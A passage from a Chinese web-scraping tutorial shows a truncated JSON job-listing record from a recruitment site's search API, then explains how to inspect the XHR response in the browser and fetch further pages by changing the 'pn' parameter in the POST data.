文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 

dom_data.jpg

 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。
post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容

如果想要获取全部内容,写一个循环语句就可以了。
 
版权所有,转载请说明出处:www.30daydo.com